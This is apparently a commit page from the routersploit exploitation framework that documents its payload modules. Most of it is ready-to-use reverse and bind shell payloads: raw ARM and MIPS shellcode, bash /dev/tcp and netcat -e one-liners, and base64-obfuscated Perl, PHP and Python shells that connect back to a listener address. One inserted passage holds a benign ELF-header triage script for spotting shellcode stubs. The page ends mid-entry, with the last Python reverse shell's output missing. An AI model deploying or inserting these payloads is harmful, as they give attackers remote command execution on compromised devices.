Unverified Commit 759d0630 by Marcin Bury Committed by GitHub

Adding tests, docs for payloads (#462)

* Adding tests, docs for payloads

* Fixing AWK Bind UDP payload
parent d2030a7d
## Description
The module generates a payload that creates an interactive TCP bind shell for the ARMLE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/armle/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. The module generates an ARMLE TCP bind shell payload
## Scenarios
```
rsf > use payloads/armle/bind_tcp
rsf (ARMLE Bind TCP) > set rport 4321
[+] rport => 4321
rsf (ARMLE Bind TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d"
"\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0"
"\x8d\xe2\x00\x60\xa0\xe1\xe1\x10\xa0\xe3\x10\x70\xa0\xe3\x01"
"\x1c\xa0\xe1\x07\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0"
"\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x07\x00\x2d"
"\xe9\x02\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0"
"\x8d\xe2\x06\x00\xa0\xe1\x03\x00\x2d\xe9\x04\x00\xa0\xe3\x0d"
"\x10\xa0\xe1\x66\x00\x90\xef\x08\xd0\x8d\xe2\x06\x00\xa0\xe1"
"\x01\x10\x41\xe0\x02\x20\x42\xe0\x07\x00\x2d\xe9\x05\x00\xa0"
"\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60"
"\xa0\xe1\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x00\x90\xef\x01"
"\x10\x51\xe2\xfb\xff\xff\x5a\x04\x10\x4d\xe2\x02\x20\x42\xe0"
"\x2f\x30\xa0\xe3\x62\x70\xa0\xe3\x07\x34\x83\xe0\x69\x70\xa0"
"\xe3\x07\x38\x83\xe0\x6e\x70\xa0\xe3\x07\x3c\x83\xe0\x2f\x40"
"\xa0\xe3\x73\x70\xa0\xe3\x07\x44\x84\xe0\x68\x70\xa0\xe3\x07"
"\x48\x84\xe0\x73\x50\xa0\xe3\x68\x70\xa0\xe3\x07\x54\x85\xe0"
"\x3e\x00\x2d\xe9\x08\x00\x8d\xe2\x00\x10\x8d\xe2\x04\x20\x8d"
"\xe2\x0b\x00\x90\xef"
)
```
## Description
The module generates a payload that creates an interactive TCP reverse shell for the ARMLE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/armle/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. The module generates an ARMLE TCP reverse shell payload
## Scenarios
```
rsf >
rsf > use payloads/armle/reverse_tcp
rsf (ARMLE Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (ARMLE Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (ARMLE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f"
"\x02\x19\x37\x01\xdf\x06\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf"
"\x3f\x27\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92"
"\x1a\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\x00\x10\xe1"
"\xc0\xa8\x01\x04\x2f\x62\x69\x6e\x2f\x73\x68\x00"
)
```
## Description
The module generates a payload that creates an interactive TCP bind shell using an awk one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/awk_bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. The module generates an awk TCP bind shell payload.
## Scenarios
```
rsf > use payloads/cmd/awk_bind_tcp
rsf (Awk Bind TCP) > set rport 4321
[+] rport => 4321
rsf (Awk Bind TCP) > run
[*] Running module...
[*] Generating payload
awk 'BEGIN{s="/inet/tcp/4321/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
```
## Description
The module generates a payload that creates an interactive TCP reverse shell using an awk one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/awk_reverse_tcp`
3. Do: `set lhost 192.168.1.3`
4. Do: `set lport 4321`
5. Do: `run`
6. The module generates an awk TCP reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/awk_reverse_tcp
rsf (Awk Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Awk Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Awk Reverse TCP) > run
[*] Running module...
[*] Generating payload
awk 'BEGIN{s="/inet/tcp/0/192.168.1.4/4321";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'
```
## Description
The module generates a payload that creates an interactive TCP reverse shell using a Bash one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/bash_reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. The module generates a Bash TCP reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/bash_reverse_tcp
rsf (Bash Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Bash Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Bash Reverse TCP) > run
[*] Running module...
[*] Generating payload
bash -i >& /dev/tcp/192.168.1.4/4321 0>&1
```
## Description
The module generates a payload that creates an interactive TCP bind shell using a netcat one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/netcat_bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. The module generates a netcat TCP bind shell payload.
## Scenarios
```
rsf > use payloads/cmd/netcat_bind_tcp
rsf (Netcat Bind TCP) > set rport 4321
[+] rport => 4321
rsf (Netcat Bind TCP) > run
[*] Running module...
[*] Generating payload
nc -lvp 4321 -e /bin/sh
```
## Description
The module generates a payload that creates an interactive TCP reverse shell using a netcat one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/netcat_reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. The module generates a netcat TCP reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/netcat_reverse_tcp
rsf (Netcat Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Netcat Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Netcat Reverse TCP) > run
[*] Running module...
[*] Generating payload
nc 192.168.1.4 4321 -e /bin/sh
```
## Description
The module generates a payload that creates an interactive TCP bind shell using a Perl one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/perl_bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. The module generates a Perl TCP bind shell payload.
## Scenarios
```
rsf > use payloads/cmd/perl_bind_tcp
rsf (Perl Bind TCP One-Liner) > set rport 4321
[+] rport => 4321
rsf (Perl Bind TCP One-Liner) > run
[*] Running module...
[*] Generating payload
perl -MIO -e "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));"
```
## Description
The module generates a payload that creates an interactive TCP reverse shell using a Perl one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/perl_reverse_tcp`
3. Do: `set lhost 192.168.1.3`
4. Do: `set lport 4321`
5. Do: `run`
6. The module generates a Perl TCP reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/perl_reverse_tcp
rsf (Perl Reverse TCP One-Liner) > set lhost 192.168.1.3
[+] lhost => 192.168.1.3
rsf (Perl Reverse TCP One-Liner) > set lport 4321
[+] lport => 4321
rsf (Perl Reverse TCP One-Liner) > run
[*] Running module...
[*] Generating payload
perl -MIO -e "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));"
```
## Description
The module generates a payload that creates an interactive TCP reverse shell using a PHP one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/php_reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. The module generates a PHP TCP reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/php_reverse_tcp
rsf (PHP Reverse TCP One-Liner) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (PHP Reverse TCP One-Liner) > set lport 4321
[+] lport => 4321
rsf (PHP Reverse TCP One-Liner) > run
[*] Running module...
[*] Generating payload
php -r "eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));"
```
## Description
The module generates a payload that creates an interactive TCP bind shell using a Python one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/python_bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. The module generates a Python TCP bind shell payload
## Scenarios
```
rsf > use payloads/cmd/python_bind_tcp
rsf (Python Reverse TCP One-Liner) > set rport 4321
[+] rport => 4321
rsf (Python Reverse TCP One-Liner) > run
[*] Running module...
[*] Generating payload
python -c "exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))"
```
## Description
The module generates a payload that creates an interactive TCP reverse shell using a Python one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/python_reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. The module generates a Python TCP reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/python_reverse_tcp
rsf (Python Reverse TCP One-Liner) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Python Reverse TCP One-Liner) > set lport 4321
[+] lport => 4321
rsf (Python Reverse TCP One-Liner) > run
[*] Running module...
[*] Generating payload
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))"
```
## Description
The module generates a payload that creates an interactive TCP bind shell for the MIPSBE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/mipsbe/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. The module generates a MIPSBE TCP bind shell payload
## Scenarios
```
rsf > use payloads/mipsbe/bind_tcp
rsf (MIPSBE Bind TCP) > set rport 4321
[+] rport => 4321
rsf (MIPSBE Bind TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01\xc0\x28"
"\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x30\x50"
"\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\xff\xfd\x01"
"\xa0\x68\x27\x01\xcd\x68\x04\x24\x0e\x10\xe1\x01\xae\x68\x25"
"\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff"
"\xec\x02\x10\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5"
"\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25\x24"
"\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02\x10\x20\x25"
"\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01"
"\x0c\xaf\xa2\xff\xff\x24\x11\xff\xfd\x02\x20\x88\x27\x8f\xa4"
"\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24"
"\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e"
"\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4"
"\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24"
"\x02\x0f\xab\x01\x01\x01\x0c"
)
```
## Description
The module generates a payload that creates an interactive TCP reverse shell for the MIPSBE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/mipsbe/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. The module generates a MIPSBE TCP reverse shell payload
## Scenarios
```
rsf > use payloads/mipsbe/reverse_tcp
rsf (MIPSBE Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (MIPSBE Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (MIPSBE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x28\x04\xff\xff\x24\x02\x0f\xa6\x01\x09\x09\x0c\x28\x04\x11"
"\x11\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80"
"\x20\x27\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01"
"\x80\x20\x27\x01\x80\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57"
"\x01\x09\x09\x0c\x30\x44\xff\xff\x24\x02\x0f\xc9\x01\x09\x09"
"\x0c\x24\x02\x0f\xc9\x01\x09\x09\x0c\x3c\x05\x00\x02\x34\xa5"
"\x10\xe1\xaf\xa5\xff\xf8\x3c\x05\xc0\xa8\x34\xa5\x01\x04\xaf"
"\xa5\xff\xfc\x23\xa5\xff\xf8\x24\x0c\xff\xef\x01\x80\x30\x27"
"\x24\x02\x10\x4a\x01\x09\x09\x0c\x3c\x08\x2f\x2f\x35\x08\x62"
"\x69\xaf\xa8\xff\xec\x3c\x08\x6e\x2f\x35\x08\x73\x68\xaf\xa8"
"\xff\xf0\x28\x07\xff\xff\xaf\xa7\xff\xf4\xaf\xa7\xff\xfc\x23"
"\xa4\xff\xec\x23\xa8\xff\xec\xaf\xa8\xff\xf8\x23\xa5\xff\xf8"
"\x27\xbd\xff\xec\x28\x06\xff\xff\x24\x02\x0f\xab\x00\x90\x93"
"\x4c"
)
```
## Description
The module generates a payload that creates an interactive TCP bind shell for the MIPSLE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/mipsle/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. The module generates a MIPSLE TCP bind shell payload
## Scenarios
```
rsf > use payloads/mipsle/bind_tcp
rsf (MIPSLE Bind TCP) > set rport 4321
[+] rport => 4321
rsf (MIPSLE Bind TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\xe0\xff\xbd\x27\xfd\xff\x0e\x24\x27\x20\xc0\x01\x27\x28\xc0"
"\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff"
"\x50\x30\xef\xff\x0e\x24\x27\x70\xc0\x01\x10\xe1\x0d\x24\x04"
"\x68\xcd\x01\xfd\xff\x0e\x24\x27\x70\xc0\x01\x25\x68\xae\x01"
"\xe0\xff\xad\xaf\xe4\xff\xa0\xaf\xe8\xff\xa0\xaf\xec\xff\xa0"
"\xaf\x25\x20\x10\x02\xef\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff"
"\xa5\x23\x49\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02\x01"
"\x01\x05\x24\x4e\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02"
"\xff\xff\x05\x28\xff\xff\x06\x28\x48\x10\x02\x24\x0c\x01\x01"
"\x01\xff\xff\xa2\xaf\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff"
"\xa4\x8f\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff"
"\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff\x06\x28"
"\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf\xaf\x73\x68\x0e"
"\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf\xf4\xff\xa0\xaf\xec\xff"
"\xa4\x27\xf8\xff\xa4\xaf\xfc\xff\xa0\xaf\xf8\xff\xa5\x27\xab"
"\x0f\x02\x24\x0c\x01\x01\x01"
)
```
## Description
The module generates a payload that creates an interactive TCP reverse shell for the MIPSLE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/mipsle/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. The module generates a MIPSLE TCP reverse shell payload
## Scenarios
```
rsf > use payloads/mipsle/reverse_tcp
rsf (MIPSLE Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (MIPSLE Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (MIPSLE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04"
"\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20"
"\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27"
"\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24"
"\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09"
"\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xe1\x05\x3c\x02\x00"
"\xa5\x34\xf8\xff\xa5\xaf\x01\x04\x05\x3c\xc0\xa8\xa5\x34\xfc"
"\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01"
"\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08"
"\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff"
"\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec"
"\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23"
"\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09"
"\x01"
)
```
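The architecture-specific modules above emit raw shellcode, and the tests added in this commit wrap that shellcode in a minimal ELF image through `generate_elf()`. Reading the headers of such a stub is the first step when one turns up on a device, because the layout itself is a tell. The parser below is an added example written for this page, not routersploit code: it reads the ELF32 header and program headers with the byte order taken from `e_ident[EI_DATA]`, so it covers the MIPSBE and MIPSLE variants as well as ARMLE, and reports the traits that mark a shellcode carrier: a single loadable segment that is readable, writable and executable, no section table, and an entry point sitting immediately after the headers. The sample bytes are the first 84 bytes of the image the ARMLE bind_tcp test in this commit expects; the shellcode body is left out because the triage only needs the headers.

```python
import struct

# First 84 bytes (52-byte ELF header + one 32-byte program header) of the image that
# this commit's armle bind_tcp test expects from generate_elf(). The 260-byte shellcode
# body that follows in that test is omitted: triage only reads the headers.
SAMPLE_ELF_HEADER = bytes.fromhex(
    "7f454c46" "01" "01" "01" "00" "0000000000000000"  # magic, ELFCLASS32, LSB, version, ABI, pad
    "0200" "2800" "01000000" "54800000" "34000000"     # e_type, e_machine, e_version, e_entry, e_phoff
    "00000000" "00000000" "3400" "2000" "0100"         # e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum
    "0000" "0000" "0000"                               # e_shentsize, e_shnum, e_shstrndx
    "01000000" "00000000" "00800000" "00800000"        # p_type=PT_LOAD, p_offset, p_vaddr, p_paddr
    "58010000" "5c020000" "07000000" "00100000"        # p_filesz, p_memsz, p_flags=RWX, p_align
)

ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
MACHINES = {0x03: "x86", 0x08: "MIPS", 0x28: "ARM", 0x3e: "x86-64"}
EHDR_FIELDS = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff", "e_shoff", "e_flags",
               "e_ehsize", "e_phentsize", "e_phnum", "e_shentsize", "e_shnum", "e_shstrndx")
PHDR_FIELDS = ("p_type", "p_offset", "p_vaddr", "p_paddr", "p_filesz", "p_memsz", "p_flags", "p_align")


def parse_elf32(data):
    """Parse the ELF32 header and program headers, honouring the byte order in e_ident."""
    if data[:4] != ELF_MAGIC or data[4] != 1:  # EI_CLASS 1 == ELFCLASS32
        raise ValueError("not a 32-bit ELF image")
    if data[5] not in (1, 2):                  # EI_DATA 1 == LSB (ARMLE, MIPSLE), 2 == MSB (MIPSBE)
        raise ValueError("unknown byte order")
    endian = "<" if data[5] == 1 else ">"
    hdr = dict(zip(EHDR_FIELDS, struct.unpack_from(endian + "HHIIIIIHHHHHH", data, 16)))
    hdr["endian"] = "little" if endian == "<" else "big"
    segments = []
    for i in range(hdr["e_phnum"]):
        off = hdr["e_phoff"] + i * hdr["e_phentsize"]
        segments.append(dict(zip(PHDR_FIELDS, struct.unpack_from(endian + "IIIIIIII", data, off))))
    return hdr, segments


def triage(data):
    """Summarise the traits that separate a shellcode-carrying stub from an ordinary binary."""
    hdr, segments = parse_elf32(data)
    loads = [s for s in segments if s["p_type"] == PT_LOAD]
    rwx = [s for s in loads if (s["p_flags"] & (PF_R | PF_W | PF_X)) == (PF_R | PF_W | PF_X)]
    code_offset = code_size = file_size = None
    for seg in loads:  # locate the entry point inside its loadable segment
        if seg["p_vaddr"] <= hdr["e_entry"] < seg["p_vaddr"] + seg["p_memsz"]:
            code_offset = seg["p_offset"] + (hdr["e_entry"] - seg["p_vaddr"])
            code_size = seg["p_offset"] + seg["p_filesz"] - code_offset
            file_size = seg["p_offset"] + seg["p_filesz"]
    headers_end = hdr["e_ehsize"] + hdr["e_phnum"] * hdr["e_phentsize"]
    return {
        "machine": MACHINES.get(hdr["e_machine"], hex(hdr["e_machine"])),
        "endian": hdr["endian"],
        "entry": hdr["e_entry"],
        "code_offset": code_offset,          # file offset of the shellcode
        "code_size": code_size,              # bytes of shellcode in the file
        "expected_file_size": file_size,     # compare against the real file length
        "single_rwx_segment": len(loads) == 1 and len(rwx) == 1,
        "no_section_table": hdr["e_shnum"] == 0,
        "entry_right_after_headers": code_offset == headers_end,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ELF_HEADER).items():
        print(f"{key:28} {value}")
```

On the sample header this reports an ARM little-endian image with entry `0x8054`, shellcode starting at file offset 84 and running for 260 bytes, one RWX `PT_LOAD` segment, and no section table; `expected_file_size` (344 here) is what to compare against the on-disk size of a captured file to spot appended data.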
## Description
The module generates a payload that creates an interactive TCP bind shell using Perl.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/perl/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. The module generates a Perl TCP bind shell payload
## Scenarios
```
rsf > use payloads/perl/bind_tcp
rsf (Perl Bind TCP) > set rport 4321
[+] rport => 4321
rsf (Perl Bind TCP) > run
[*] Running module...
[*] Generating payload
use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));
```
## Description
The module generates a payload that creates an interactive TCP reverse shell using Perl.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/perl/reverse_tcp`
3. Do: `set lhost 192.168.1.3`
4. Do: `set lport 4321`
5. Do: `run`
6. The module generates a Perl TCP reverse shell payload
## Scenarios
```
rsf > use payloads/perl/reverse_tcp
rsf (Perl Reverse TCP) > set lhost 192.168.1.3
[+] lhost => 192.168.1.3
rsf (Perl Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Perl Reverse TCP) > run
[*] Running module...
[*] Generating payload
use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='))
```
## Description
The module generates a payload that creates an interactive TCP reverse shell using PHP.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/php/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. The module generates a PHP TCP reverse shell payload
## Scenarios
```
rsf > use payloads/php/reverse_tcp
rsf (PHP Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (PHP Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (PHP Reverse TCP) > run
[*] Running module...
[*] Generating payload
eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));
```
## Description
The module generates a payload that creates an interactive TCP bind shell using Python.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/python/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. The module generates a Python TCP bind shell payload
## Scenarios
```
rsf > use payloads/python/bind_tcp
rsf (Python Bind TCP) > set rport 4321
[+] rport => 4321
rsf (Python Bind TCP) > run
[*] Running module...
[*] Generating payload
exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))
```
## Description
The module generates a payload that creates an interactive TCP reverse shell using Python.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/python/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. The module generates a Python TCP reverse shell payload
## Scenarios
```
rsf > use payloads/python/reverse_tcp
rsf (Python Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Python Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Python Reverse TCP) > run
[*] Running module...
[*] Generating payload
